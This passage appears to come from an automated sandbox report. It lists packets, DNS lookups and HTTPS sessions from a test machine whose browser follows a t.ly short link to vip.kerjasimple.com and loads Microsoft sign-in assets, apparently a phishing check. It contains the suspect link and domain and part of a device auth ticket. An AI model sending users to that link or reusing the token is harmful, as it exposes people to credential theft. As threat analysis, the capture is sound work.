                                                        Nov 12, 2024 16:28:06.046144962 CET4435002113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.046628952 CET50021443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.046686888 CET4435002113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.047111034 CET50021443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.047116995 CET4435002113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.173067093 CET4435002213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.173657894 CET50022443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.173692942 CET4435002213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.174122095 CET50022443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.174129009 CET4435002213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.178405046 CET4435002113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.178581953 CET4435002113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.178634882 CET50021443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.178638935 CET4435002113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.178689957 CET50021443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.178730965 CET50021443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.178759098 CET4435002113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.178774118 CET50021443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.178780079 CET4435002113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.181977987 CET50025443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.182025909 CET4435002513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.182091951 CET50025443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.182240963 CET50025443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.182257891 CET4435002513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.303061962 CET4435002213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.303124905 CET4435002213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.303195000 CET50022443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.303474903 CET50022443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.303488970 CET4435002213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.368882895 CET4435002313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.369565010 CET50023443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.369599104 CET4435002313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.370064020 CET50023443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.370069981 CET4435002313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.502002954 CET4435002313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.502083063 CET4435002313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.502152920 CET50023443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.502490997 CET50023443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.502521992 CET4435002313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.502537966 CET50023443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.502543926 CET4435002313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.550228119 CET4435002413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.551064014 CET50024443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.551091909 CET4435002413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.551609993 CET50024443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.551615000 CET4435002413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.686342955 CET4435002413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.686438084 CET4435002413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.686712980 CET50024443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.686712980 CET50024443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.686753035 CET50024443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.686769962 CET4435002413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.923429966 CET4435002513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.924503088 CET50025443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.924503088 CET50025443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:06.924561977 CET4435002513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:06.924591064 CET4435002513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:07.053778887 CET4435002513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:07.053865910 CET4435002513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:07.054052114 CET50025443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:07.054217100 CET50025443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:07.054240942 CET4435002513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:07.054274082 CET50025443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:28:07.054280996 CET4435002513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:28:08.789423943 CET44349992142.250.185.228192.168.2.6
                                                        Nov 12, 2024 16:28:08.789500952 CET44349992142.250.185.228192.168.2.6
                                                        Nov 12, 2024 16:28:08.792258978 CET49992443192.168.2.6142.250.185.228
                                                        Nov 12, 2024 16:28:09.699157953 CET49992443192.168.2.6142.250.185.228
                                                        Nov 12, 2024 16:28:09.699184895 CET44349992142.250.185.228192.168.2.6
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Nov 12, 2024 16:26:53.166217089 CET53626101.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:26:53.270351887 CET53554001.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:26:54.615591049 CET53506001.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:26:55.147104025 CET5016953192.168.2.61.1.1.1
                                                        Nov 12, 2024 16:26:55.147262096 CET5768353192.168.2.61.1.1.1
                                                        Nov 12, 2024 16:26:55.154268026 CET53501691.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:26:55.154295921 CET53576831.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:26:56.357178926 CET5149353192.168.2.61.1.1.1
                                                        Nov 12, 2024 16:26:56.357635021 CET5245253192.168.2.61.1.1.1
                                                        Nov 12, 2024 16:26:56.374315977 CET53524521.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:26:56.376395941 CET53514931.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:26:57.881551981 CET6223553192.168.2.61.1.1.1
                                                        Nov 12, 2024 16:26:57.881838083 CET5373253192.168.2.61.1.1.1
                                                        Nov 12, 2024 16:26:57.888330936 CET53622351.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:26:57.888549089 CET53537321.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:27:01.551619053 CET6450053192.168.2.61.1.1.1
                                                        Nov 12, 2024 16:27:01.552138090 CET4964453192.168.2.61.1.1.1
                                                        Nov 12, 2024 16:27:01.561065912 CET53496441.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:27:01.562447071 CET53645001.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:27:02.938159943 CET6343653192.168.2.61.1.1.1
                                                        Nov 12, 2024 16:27:02.938159943 CET5635353192.168.2.61.1.1.1
                                                        Nov 12, 2024 16:27:02.951865911 CET53563531.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:27:02.954385042 CET53634361.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:27:03.041488886 CET4944253192.168.2.61.1.1.1
                                                        Nov 12, 2024 16:27:03.041765928 CET5714253192.168.2.61.1.1.1
                                                        Nov 12, 2024 16:27:03.044667006 CET5560953192.168.2.61.1.1.1
                                                        Nov 12, 2024 16:27:03.044667006 CET6240053192.168.2.61.1.1.1
                                                        Nov 12, 2024 16:27:03.045476913 CET6476153192.168.2.61.1.1.1
                                                        Nov 12, 2024 16:27:03.045775890 CET5434153192.168.2.61.1.1.1
                                                        Nov 12, 2024 16:27:03.052419901 CET53647611.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:27:03.053029060 CET53556091.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:27:03.053128958 CET53571421.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:27:03.053419113 CET53494421.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:27:03.053766966 CET53543411.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:27:03.063776016 CET53624001.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:27:03.153328896 CET53561331.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:27:04.567087889 CET6166353192.168.2.61.1.1.1
                                                        Nov 12, 2024 16:27:04.567290068 CET5399453192.168.2.61.1.1.1
                                                        Nov 12, 2024 16:27:04.574421883 CET53539941.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:27:04.574728012 CET53616631.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:27:05.982089996 CET5517753192.168.2.61.1.1.1
                                                        Nov 12, 2024 16:27:05.983063936 CET5821853192.168.2.61.1.1.1
                                                        Nov 12, 2024 16:27:05.989387035 CET53551771.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:27:05.990509033 CET53582181.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:27:11.721059084 CET53622891.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:27:30.744210958 CET53610211.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:27:53.058376074 CET53494611.1.1.1192.168.2.6
                                                        Nov 12, 2024 16:27:53.531445980 CET53539801.1.1.1192.168.2.6
                                                        TimestampSource IPDest IPChecksumCodeType
                                                        Nov 12, 2024 16:27:03.124382973 CET192.168.2.61.1.1.1c2e0(Port unreachable)Destination Unreachable
                                                        Nov 12, 2024 16:27:04.300728083 CET192.168.2.61.1.1.1c2de(Port unreachable)Destination Unreachable
                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Nov 12, 2024 16:26:55.147104025 CET192.168.2.61.1.1.10x3674Standard query (0)t.lyA (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:26:55.147262096 CET192.168.2.61.1.1.10x8262Standard query (0)t.ly65IN (0x0001)false
                                                        Nov 12, 2024 16:26:56.357178926 CET192.168.2.61.1.1.10xdcfbStandard query (0)vip.kerjasimple.comA (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:26:56.357635021 CET192.168.2.61.1.1.10xed36Standard query (0)vip.kerjasimple.com65IN (0x0001)false
                                                        Nov 12, 2024 16:26:57.881551981 CET192.168.2.61.1.1.10xf6c8Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:26:57.881838083 CET192.168.2.61.1.1.10x8f0Standard query (0)www.google.com65IN (0x0001)false
                                                        Nov 12, 2024 16:27:01.551619053 CET192.168.2.61.1.1.10x35beStandard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:01.552138090 CET192.168.2.61.1.1.10x88a7Standard query (0)cdn.socket.io65IN (0x0001)false
                                                        Nov 12, 2024 16:27:02.938159943 CET192.168.2.61.1.1.10xd988Standard query (0)vip.kerjasimple.com65IN (0x0001)false
                                                        Nov 12, 2024 16:27:02.938159943 CET192.168.2.61.1.1.10x5f6dStandard query (0)vip.kerjasimple.comA (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.041488886 CET192.168.2.61.1.1.10x2490Standard query (0)cdn.socket.ioA (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.041765928 CET192.168.2.61.1.1.10x24cfStandard query (0)cdn.socket.io65IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.044667006 CET192.168.2.61.1.1.10x3992Standard query (0)www.w3schools.comA (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.044667006 CET192.168.2.61.1.1.10xdc7bStandard query (0)www.w3schools.com65IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.045476913 CET192.168.2.61.1.1.10xaef5Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.045775890 CET192.168.2.61.1.1.10x194fStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                        Nov 12, 2024 16:27:04.567087889 CET192.168.2.61.1.1.10x7139Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:04.567290068 CET192.168.2.61.1.1.10x68baStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                        Nov 12, 2024 16:27:05.982089996 CET192.168.2.61.1.1.10xa822Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:05.983063936 CET192.168.2.61.1.1.10x80feStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Nov 12, 2024 16:26:55.154268026 CET1.1.1.1192.168.2.60x3674No error (0)t.ly104.20.7.133A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:26:55.154268026 CET1.1.1.1192.168.2.60x3674No error (0)t.ly104.20.6.133A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:26:55.154295921 CET1.1.1.1192.168.2.60x8262No error (0)t.ly65IN (0x0001)false
                                                        Nov 12, 2024 16:26:56.376395941 CET1.1.1.1192.168.2.60xdcfbNo error (0)vip.kerjasimple.com159.89.194.49A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:26:57.888330936 CET1.1.1.1192.168.2.60xf6c8No error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:26:57.888549089 CET1.1.1.1192.168.2.60x8f0No error (0)www.google.com65IN (0x0001)false
                                                        Nov 12, 2024 16:27:01.561065912 CET1.1.1.1192.168.2.60x88a7No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 12, 2024 16:27:01.562447071 CET1.1.1.1192.168.2.60x35beNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 12, 2024 16:27:01.562447071 CET1.1.1.1192.168.2.60x35beNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:01.562447071 CET1.1.1.1192.168.2.60x35beNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:01.562447071 CET1.1.1.1192.168.2.60x35beNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:01.562447071 CET1.1.1.1192.168.2.60x35beNo error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:02.951865911 CET1.1.1.1192.168.2.60x5f6dNo error (0)vip.kerjasimple.com159.89.194.49A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.052419901 CET1.1.1.1192.168.2.60xaef5No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.052419901 CET1.1.1.1192.168.2.60xaef5No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.053029060 CET1.1.1.1192.168.2.60x3992No error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.053029060 CET1.1.1.1192.168.2.60x3992No error (0)cs837.wac.edgecastcdn.net192.229.133.221A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.053128958 CET1.1.1.1192.168.2.60x24cfNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.053419113 CET1.1.1.1192.168.2.60x2490No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.053419113 CET1.1.1.1192.168.2.60x2490No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.89A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.053419113 CET1.1.1.1192.168.2.60x2490No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.33A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.053419113 CET1.1.1.1192.168.2.60x2490No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.5A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.053419113 CET1.1.1.1192.168.2.60x2490No error (0)d2vgu95hoyrpkh.cloudfront.net18.245.31.78A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.053766966 CET1.1.1.1192.168.2.60x194fNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.063776016 CET1.1.1.1192.168.2.60xdc7bNo error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.091062069 CET1.1.1.1192.168.2.60x67dfNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.091062069 CET1.1.1.1192.168.2.60x67dfNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.092256069 CET1.1.1.1192.168.2.60x99c7No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 12, 2024 16:27:03.092256069 CET1.1.1.1192.168.2.60x99c7No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:04.277637959 CET1.1.1.1192.168.2.60x28b2No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 12, 2024 16:27:04.277637959 CET1.1.1.1192.168.2.60x28b2No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:04.308936119 CET1.1.1.1192.168.2.60xf3cNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 12, 2024 16:27:04.308936119 CET1.1.1.1192.168.2.60xf3cNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:04.574421883 CET1.1.1.1192.168.2.60x68baNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 12, 2024 16:27:04.574421883 CET1.1.1.1192.168.2.60x68baNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 12, 2024 16:27:04.574728012 CET1.1.1.1192.168.2.60x7139No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 12, 2024 16:27:04.574728012 CET1.1.1.1192.168.2.60x7139No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 12, 2024 16:27:04.574728012 CET1.1.1.1192.168.2.60x7139No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:05.989387035 CET1.1.1.1192.168.2.60xa822No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 12, 2024 16:27:05.989387035 CET1.1.1.1192.168.2.60xa822No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 12, 2024 16:27:05.989387035 CET1.1.1.1192.168.2.60xa822No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:05.990509033 CET1.1.1.1192.168.2.60x80feNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 12, 2024 16:27:05.990509033 CET1.1.1.1192.168.2.60x80feNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 12, 2024 16:27:07.323679924 CET1.1.1.1192.168.2.60x7ef7No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                        Nov 12, 2024 16:27:07.323679924 CET1.1.1.1192.168.2.60x7ef7No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:09.919128895 CET1.1.1.1192.168.2.60x182bNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:27:09.919128895 CET1.1.1.1192.168.2.60x182bNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:28:08.582277060 CET1.1.1.1192.168.2.60x150No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                        Nov 12, 2024 16:28:08.582277060 CET1.1.1.1192.168.2.60x150No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                        • t.ly
                                                        • vip.kerjasimple.com
                                                        • otelrules.azureedge.net
                                                        • https:
                                                          • cdn.socket.io
                                                          • cdnjs.cloudflare.com
                                                          • aadcdn.msauth.net
                                                          • logincdn.msauth.net
                                                          • www.w3schools.com
                                                          • aadcdn.msftauth.net
                                                        • fs.microsoft.com
                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        0192.168.2.64970940.115.3.253443
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:26:53 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 45 42 44 63 56 4b 30 4e 67 45 6d 33 6e 43 34 35 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 66 33 64 39 30 34 33 37 63 31 66 34 31 32 34 0d 0a 0d 0a
                                                        Data Ascii: CNT 1 CON 305MS-CV: EBDcVK0NgEm3nC45.1Context: 1f3d90437c1f4124
                                                        2024-11-12 15:26:53 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                        Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                        2024-11-12 15:26:53 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 45 42 44 63 56 4b 30 4e 67 45 6d 33 6e 43 34 35 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 66 33 64 39 30 34 33 37 63 31 66 34 31 32 34 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 37 48 38 66 37 55 30 55 33 58 50 6e 6c 46 42 54 37 41 34 62 47 36 44 70 6a 4e 57 77 42 59 2f 59 33 57 67 4b 61 6a 39 54 41 52 38 70 32 64 34 4b 33 68 50 6c 6e 45 70 6a 33 68 41 53 42 46 67 56 47 34 5a 33 54 6d 4a 63 74 76 39 54 7a 71 47 61 59 52 38 31 65 38 42 4a 48 76 6b 63 4f 6b 72 56 39 65 39 4c 63 4d 6b 52 76 33 79 34
                                                        Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: EBDcVK0NgEm3nC45.2Context: 1f3d90437c1f4124<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZ7H8f7U0U3XPnlFBT7A4bG6DpjNWwBY/Y3WgKaj9TAR8p2d4K3hPlnEpj3hASBFgVG4Z3TmJctv9TzqGaYR81e8BJHvkcOkrV9e9LcMkRv3y4
                                                        2024-11-12 15:26:53 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 45 42 44 63 56 4b 30 4e 67 45 6d 33 6e 43 34 35 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 31 66 33 64 39 30 34 33 37 63 31 66 34 31 32 34 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                        Data Ascii: BND 3 CON\WNS 0 197MS-CV: EBDcVK0NgEm3nC45.3Context: 1f3d90437c1f4124<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                        2024-11-12 15:26:53 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                        Data Ascii: 202 1 CON 58
                                                        2024-11-12 15:26:53 UTC58INData Raw: 4d 53 2d 43 56 3a 20 78 36 4a 76 58 4d 72 64 64 55 6d 31 44 4d 4f 43 43 76 30 31 75 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                        Data Ascii: MS-CV: x6JvXMrddUm1DMOCCv01uA.0Payload parsing failed.


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.649716104.20.7.1334436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-12 15:26:55 UTC652OUTGET /Bv1rG HTTP/1.1
                                                        Host: t.ly
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        sec-ch-ua-platform: "Windows"
                                                        Upgrade-Insecure-Requests: 1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: navigate
                                                        Sec-Fetch-User: ?1
                                                        Sec-Fetch-Dest: document
